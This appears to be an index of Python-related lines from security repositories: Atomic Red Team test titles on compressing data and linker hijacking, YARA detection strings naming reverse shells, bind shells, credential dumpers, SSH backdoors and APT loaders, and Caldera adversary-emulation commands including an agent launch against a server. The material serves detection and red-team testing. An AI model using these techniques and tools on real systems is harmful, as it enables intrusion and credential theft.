atomic-red-team T1560.002.md - Atomic Test #4 - Compressing data using tarfile in Python (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md ## Atomic Test #1 - Compressing data using GZip in Python (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md Uses GZip from Python to compress files MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md ##### Description: Requires Python MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md which_python=which python; $which_python -V MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md ## Atomic Test #2 - Compressing data using bz2 in Python (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md Uses bz2 from Python to compress files MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md ## Atomic Test #3 - Compressing data using zipfile in Python (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md Uses zipfile from Python to compress files MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md ## Atomic Test #4 - Compressing data using tarfile in Python (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md Uses tarfile from Python to compress files MIT License. © 2018 Red Canary
atomic-red-team T1574.006.md On Linux and macOS, hijacking dynamic linker variables may grant access to the victim process’s memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the export command, setenv function, or putenv function. Adversaries can also leverage Dynamic Linker Hijacking to export variables in a shell or set variables programmatically using higher level syntax such Python’s os.environ. MIT License. © 2018 Red Canary
signature-base airbnb_binaryalert.yar description = “A tool for injecting arbitrary code into running Python processes.” CC BY-NC 4.0
signature-base airbnb_binaryalert.yar $s3 = “A reverse Python connection payload.” fullword ascii wide CC BY-NC 4.0
signature-base airbnb_binaryalert.yar $s4 = “pyrasite - inject code into a running python process” fullword ascii wide CC BY-NC 4.0
signature-base airbnb_binaryalert.yar $s10 = “Write out a reverse python connection payload with a custom port” fullword ascii wide CC BY-NC 4.0
signature-base airbnb_binaryalert.yar $s13 = “A reverse Python shell that behaves like Python interactive interpreter.” fullword ascii wide CC BY-NC 4.0
signature-base airbnb_binaryalert.yar description = “creddump is a python tool to extract credentials and secrets from Windows registry hives.” CC BY-NC 4.0
signature-base apt_backdoor_ssh_python.yar description = “Custome SSH backdoor based on python and paramiko - file server.py” CC BY-NC 4.0
signature-base apt_fvey_shadowbroker_jan17.yar $b1 = “Added Ops library to Python search path” fullword ascii CC BY-NC 4.0
signature-base apt_hafnium_log_sigs.yar $xr4 = /POST \/ecp\/[^\n]{100,600} (ExchangeServicesClient\/0.0.0.0|python-requests\/2.19.1|python-requests\/2.25.1)[^\n]{200,600} (200|301|302) / CC BY-NC 4.0
signature-base apt_nk_inkysquid.yar description = “Python Loader used to execute the BLUELIGHT malware family.” CC BY-NC 4.0
signature-base apt_nk_inkysquid.yar $s5 = “python ended” ascii CC BY-NC 4.0
signature-base apt_op_wocao.yar description = “Strings from Python version of Agent” CC BY-NC 4.0
signature-base apt_op_wocao.yar description = “Piece of Base64 encoded data from Agent Python version” CC BY-NC 4.0
signature-base apt_op_wocao.yar description = “Strings from Python keylogger” CC BY-NC 4.0
signature-base apt_op_wocao.yar description = “Python getos utility” CC BY-NC 4.0
signature-base apt_sandworm_exim_expl.yar description = “Detects Sandworm Python loader” CC BY-NC 4.0
signature-base gen_fireeye_redteam_tools.yar description = “Detects FireEye’s Python Redflar” CC BY-NC 4.0
signature-base gen_fireeye_redteam_tools.yar description = “Detects FireEye’s Python MATRYOSHKA tool” CC BY-NC 4.0
signature-base gen_malware_MacOS_plist_suspicious.yar $p1 = “python” ascii CC BY-NC 4.0
signature-base gen_osx_evilosx.yar //strings present in decoded python script: CC BY-NC 4.0
signature-base gen_osx_pyagent_persistence.yar description = “Detects a Python agent that establishes persistence on macOS” CC BY-NC 4.0
signature-base gen_osx_pyagent_persistence.yar $h1 = “#!/usr/bin/env python” CC BY-NC 4.0
signature-base gen_python_encoded_adware.yar description = “Encoded Python payload for adware” CC BY-NC 4.0
signature-base gen_python_pty_shell.yar reference = “https://github.com/infodox/python-pty-shells/blob/master/tcp_pty_backconnect.py” CC BY-NC 4.0
signature-base gen_python_pyminifier_encoded_payload.yar description = “Detects python code encoded by pyminifier. Used by the Machete malware as researched by ESET” CC BY-NC 4.0
signature-base gen_python_reverse_shell.yara description = “Python Base64 encoded reverse shell” CC BY-NC 4.0
signature-base gen_rats_malwareconfig.yar description = “Detects Python RAT” CC BY-NC 4.0
signature-base gen_redsails.yar description = “Detects Red Sails Hacktool - Python” CC BY-NC 4.0
signature-base gen_susp_wer_files.yar $l3 = “AppPath=C:\Python” wide nocase CC BY-NC 4.0
signature-base gen_webshells.yar $pbs30 = “bot|spider|crawler|slurp|teoma|archive|track|snoopy|java|lwp|wget|curl|client|python|libwww” wide ascii CC BY-NC 4.0
signature-base thor-hacktools.yar description = “Detects malicious python shell” CC BY-NC 4.0
signature-base thor-webshells.yar $s0 = “#Use: python wh_bindshell.py [port] [password]” CC BY-NC 4.0
signature-base thor-webshells.yar $s2 = “python -c"import md5;x=md5.new(‘you_password’);print x.hexdigest()"” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s2 = “# d00r.py 0.3a (reverse|bind)-shell in python by fQ” fullword CC BY-NC 4.0
signature-base thor-webshells.yar description = “Semi-Auto-generated - file cgi-python.py.txt” CC BY-NC 4.0
stockpile 0ab383be-b819-41bf-91b9-1bd4404d83bf.yml description: A Python agent which communicates via the HTML contact Apache-2.0
stockpile 0ab383be-b819-41bf-91b9-1bd4404d83bf.yml python ragdoll.py -W $server#{app.contact.html} Apache-2.0
stockpile b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml name: Check Python Apache-2.0
stockpile b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml description: Check to see what version of python is installed Apache-2.0
stockpile b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml python3 --version;python2 --version;python --version Apache-2.0
stockpile b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml python3 --version&python2 --version&python --version Apache-2.0

MIT License. Copyright (c) 2020-2021 Strontic.